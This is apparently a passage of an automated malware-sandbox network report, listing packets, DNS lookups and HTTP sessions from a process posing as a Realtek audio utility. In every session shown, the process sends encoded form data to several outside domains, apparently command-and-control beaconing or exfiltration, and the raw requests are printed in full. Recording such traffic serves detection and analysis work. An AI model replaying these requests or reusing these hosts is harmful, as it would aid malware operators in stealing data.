                                                                                        Nov 27, 2024 11:30:00.608669043 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:00.780627012 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:00.780857086 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:00.784394979 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:00.784439087 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:00.956042051 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:00.956121922 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:00.956139088 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:00.956399918 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232091904 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232172012 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232429981 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:01.232554913 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232573032 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232672930 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232770920 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:01.232795954 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232815981 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232898951 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232994080 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:01.233161926 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:01.241381884 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.241563082 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:16.376846075 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376858950 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376916885 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.376962900 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.377676964 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.377676964 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.377724886 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:18.026012897 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.042362928 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.379925966 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.380136967 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.382648945 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.720134020 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.722738981 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.722843885 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.722918034 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.722961903 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723009109 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723076105 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.723093033 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723129988 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723191977 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723236084 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723233938 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.723499060 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.723560095 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.724384069 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.724666119 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.060621977 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.060638905 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.060801983 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.060861111 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.060899973 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061001062 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061012030 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061084986 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061105967 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061156034 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061243057 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061295986 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061331987 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061361074 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061384916 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061528921 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061532974 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061577082 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061584949 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061592102 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061599970 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061691046 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061692953 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061713934 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061808109 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061964989 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.062083006 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.062211037 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.062448978 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.398416996 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398531914 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398662090 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398675919 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398798943 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398812056 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398922920 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399046898 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399060011 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399075031 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.399152994 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399252892 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.399277925 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399288893 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399362087 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.399492025 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399558067 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399564981 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.399569035 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399579048 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399586916 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399799109 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.400012970 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.400686026 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.737811089 CET804976543.163.1.110192.168.11.20
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 27, 2024 11:28:56.847572088 CET | 192.168.11.20 | 1.1.1.1 | 0xbf53 | Standard query (0) | www.christinascuties.net | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:29:12.556411028 CET | 192.168.11.20 | 1.1.1.1 | 0x3632 | Standard query (0) | www.techmiseajour.net | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:29:27.568911076 CET | 192.168.11.20 | 1.1.1.1 | 0xc510 | Standard query (0) | www.aktmarket.xyz | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:29:41.300121069 CET | 192.168.11.20 | 1.1.1.1 | 0xc434 | Standard query (0) | www.golivenow.live | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:29:55.015789032 CET | 192.168.11.20 | 1.1.1.1 | 0x3723 | Standard query (0) | www.iglpg.online | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:30:09.028322935 CET | 192.168.11.20 | 1.1.1.1 | 0x20c1 | Standard query (0) | www.1qcczjvh2.autos | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:30:25.415615082 CET | 192.168.11.20 | 1.1.1.1 | 0xec10 | Standard query (0) | www.gk88top.top | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:30:39.787247896 CET | 192.168.11.20 | 1.1.1.1 | 0x2462 | Standard query (0) | www.superiorfencing.net | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 27, 2024 11:28:57.086736917 CET | 1.1.1.1 | 192.168.11.20 | 0xbf53 | No error (0) | www.christinascuties.net | | 74.208.236.156 | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:29:12.908915997 CET | 1.1.1.1 | 192.168.11.20 | 0x3632 | No error (0) | www.techmiseajour.net | techmiseajour.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 27, 2024 11:29:12.908915997 CET | 1.1.1.1 | 192.168.11.20 | 0x3632 | No error (0) | techmiseajour.net | | 84.32.84.32 | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:29:27.751832008 CET | 1.1.1.1 | 192.168.11.20 | 0xc510 | No error (0) | www.aktmarket.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:29:27.751832008 CET | 1.1.1.1 | 192.168.11.20 | 0xc510 | No error (0) | www.aktmarket.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:29:41.553572893 CET | 1.1.1.1 | 192.168.11.20 | 0xc434 | No error (0) | www.golivenow.live | | 66.29.149.46 | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:29:55.202625990 CET | 1.1.1.1 | 192.168.11.20 | 0x3723 | No error (0) | www.iglpg.online | iglpg.online | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 27, 2024 11:29:55.202625990 CET | 1.1.1.1 | 192.168.11.20 | 0x3723 | No error (0) | iglpg.online | | 173.201.189.241 | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:30:09.315347910 CET | 1.1.1.1 | 192.168.11.20 | 0x20c1 | No error (0) | www.1qcczjvh2.autos | 1.1qcczjvh2.autos | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 27, 2024 11:30:09.315347910 CET | 1.1.1.1 | 192.168.11.20 | 0x20c1 | No error (0) | 1.1qcczjvh2.autos | 1hong-fted.pels5zqo.shop | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 27, 2024 11:30:09.315347910 CET | 1.1.1.1 | 192.168.11.20 | 0x20c1 | No error (0) | 1hong-fted.pels5zqo.shop | 1hong.pels5zqo.shop | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 27, 2024 11:30:09.315347910 CET | 1.1.1.1 | 192.168.11.20 | 0x20c1 | No error (0) | 1hong.pels5zqo.shop | | 43.163.1.110 | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:30:25.592617035 CET | 1.1.1.1 | 192.168.11.20 | 0xec10 | No error (0) | www.gk88top.top | | 104.21.7.187 | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:30:25.592617035 CET | 1.1.1.1 | 192.168.11.20 | 0xec10 | No error (0) | www.gk88top.top | | 172.67.137.47 | A (IP address) | IN (0x0001) | false |
| Nov 27, 2024 11:30:40.535511017 CET | 1.1.1.1 | 192.168.11.20 | 0x2462 | No error (0) | www.superiorfencing.net | superiorfencing.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 27, 2024 11:30:40.535511017 CET | 1.1.1.1 | 192.168.11.20 | 0x2462 | No error (0) | superiorfencing.net | | 103.230.159.86 | A (IP address) | IN (0x0001) | false |

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.11.20 | 49745 | 74.208.236.156 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe |

Timestamp: Nov 27, 2024 11:28:57.303443909 CET; Bytes transferred: 417; Direction: OUT; Data:
GET /raea/?wIXhAG=PqKj/8KuIq0WSNkKBtYQxtP5ekYb45s1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVW+OdEFKSgTrNoF3hmw=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.christinascuties.net
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Timestamp: Nov 27, 2024 11:28:57.521481037 CET; Bytes transferred: 770; Direction: IN; Data:
HTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 626
                                                                                        Connection: close
                                                                                        Date: Wed, 27 Nov 2024 10:28:57 GMT
                                                                                        Server: Apache
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.11.20 | 49746 | 84.32.84.32 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe |

Timestamp: Nov 27, 2024 11:29:13.330559969 CET; Bytes transferred: 686; Direction: OUT; Data:
POST /jytl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.techmiseajour.net
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 203
                                                                                        Origin: http://www.techmiseajour.net
                                                                                        Referer: http://www.techmiseajour.net/jytl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Ascii: wIXhAG=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUjXWW8o+iHvJjyLAUVmOTOZFPisgmeGYaLQ==


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.11.20 | 49747 | 84.32.84.32 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe |

Timestamp: Nov 27, 2024 11:29:16.272559881 CET; Bytes transferred: 706; Direction: OUT; Data:
POST /jytl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.techmiseajour.net
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 223
                                                                                        Origin: http://www.techmiseajour.net
                                                                                        Referer: http://www.techmiseajour.net/jytl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Ascii: wIXhAG=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOG4HuI1ybvU5ZwDaWrm1BWCz3IHLGrnQUMaNrpAUu/OnLdUcqx7kSWogG145EXRBIKBy8/H2zGLiquQtO8zyfmGriN/4bUXUFHvD7swh/Hp3tKydGz1CJf2b6Wuj4qL/Pdtl3dNOIU63NKZ9mcZOcEZBWSgwKjfk2Mfvs5ZXgUiiWow=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        3 | 192.168.11.20 | 49748 | 84.32.84.32 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 27, 2024 11:29:19.209932089 CET | 7855 | OUT | POST /jytl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.techmiseajour.net
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 7371
                                                                                        Origin: http://www.techmiseajour.net
                                                                                        Referer: http://www.techmiseajour.net/jytl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Ascii: wIXhAG= [TRUNCATED]


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        4 | 192.168.11.20 | 49749 | 84.32.84.32 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 27, 2024 11:29:22.147238016 CET | 414 | OUT | GET /jytl/?wIXhAG=g6hM5OfAy0aZTOdwtizvGwaLh1tc9b9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGmxIPeV05u7M1niwgNE=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.techmiseajour.net
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:29:22.565191984 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        Date: Wed, 27 Nov 2024 10:29:04 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 9973
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Server: hcdn
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        x-hcdn-request-id: 2838f6c1f145e0a795ef0aa3f3d37374-jnb-edge2
                                                                                        Expires: Wed, 27 Nov 2024 10:29:03 GMT
                                                                                        Cache-Control: no-cache
                                                                                        Accept-Ranges: bytes
                                                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        5 | 192.168.11.20 | 49750 | 13.248.169.48 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 27, 2024 11:29:27.944976091 CET | 674 | OUT | POST /wb7v/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.aktmarket.xyz
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 203
                                                                                        Origin: http://www.aktmarket.xyz
                                                                                        Referer: http://www.aktmarket.xyz/wb7v/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Ascii: wIXhAG=FCc6E16lz2LQ9zsO+bmOUCmsnXugU1/wXH6aUEfc46hEDtR/WTJXQ0VWWcYVuWXc3qkJ3LrYDoGJyyM1ehoTHMFPXu9Z1s7eFTUdo2/40zFogffJrfomthtQh75HvcomKXm4h9eUT+fmUU1uMfqjQB8O5jwqDhr3ot23AUFEGRVxQKbwf4ewTKpQ03jS2gqYdw==


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        6 | 192.168.11.20 | 49751 | 13.248.169.48 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 27, 2024 11:29:30.666505098 CET | 694 | OUT | POST /wb7v/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.aktmarket.xyz
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 223
                                                                                        Origin: http://www.aktmarket.xyz
                                                                                        Referer: http://www.aktmarket.xyz/wb7v/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Ascii: wIXhAG=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4sREDNh/YyJXAkVWOMYMk2Xb3qp03KXYDoCJyy81eQoQWMFJCe9btM7eFTUdo27e0zdohvvJr+opgBsi2L5H+MoiKXnCh8SyT93mUQluMuqkbB8I9jxnMESzxs+oTzpKJCVGc8WqCKqUQZ1iwHa60irDAxkEEYms/SZRLMgvHtbvR+U=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        7 | 192.168.11.20 | 49752 | 13.248.169.48 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 27, 2024 11:29:33.384470940 CET | 2578 | OUT | POST /wb7v/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.aktmarket.xyz
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 7371
                                                                                        Origin: http://www.aktmarket.xyz
                                                                                        Referer: http://www.aktmarket.xyz/wb7v/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Ascii: wIXhAG= [TRUNCATED]
                                                                                        Nov 27, 2024 11:29:33.384531975 CET | 5265 | OUT
                                                                                        Data Ascii: QxMnHV8qSgyyotKJNOyQ9fl6oW30DTZrkZ1/FJrGlvKnz33QkGtCf3AsYJ9b9pG+ogjEzCUbJcsypb50GuWGpJi+UvDWQbKVOUGiZJpCE2Hp7NHWJZs8py+GRCUP1nPHLjOqRhJVqt2DZ8p1QC94+4JMZnRGL9XyFR/dWFZ6VtU34yWcjJJkeslNQc0U8pjGQD44YheH+oq1veYTqoiyFRYp/a5ZnPgNBa3TAUQS9Sh0jOVQtsn


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        8 | 192.168.11.20 | 49753 | 13.248.169.48 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 27, 2024 11:29:36.102649927 CET | 410 | OUT | GET /wb7v/?wIXhAG=IA0aHAKfw1DI7BcblrymbxKn4Du9G2zIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpGvOs3Qutuf7i9hpgx0=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.aktmarket.xyz
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:29:36.290648937 CET | 401 | IN | HTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 27 Nov 2024 10:29:36 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 261
                                                                                        Connection: close
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wIXhAG=IA0aHAKfw1DI7BcblrymbxKn4Du9G2zIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpGvOs3Qutuf7i9hpgx0=&67ssp=tVX5mtZ66UVF"}</script></head></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        9 | 192.168.11.20 | 49754 | 66.29.149.46 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 27, 2024 11:29:41.727457047 CET | 677 | OUT | POST /r2k9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.golivenow.live
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 203
                                                                                        Origin: http://www.golivenow.live
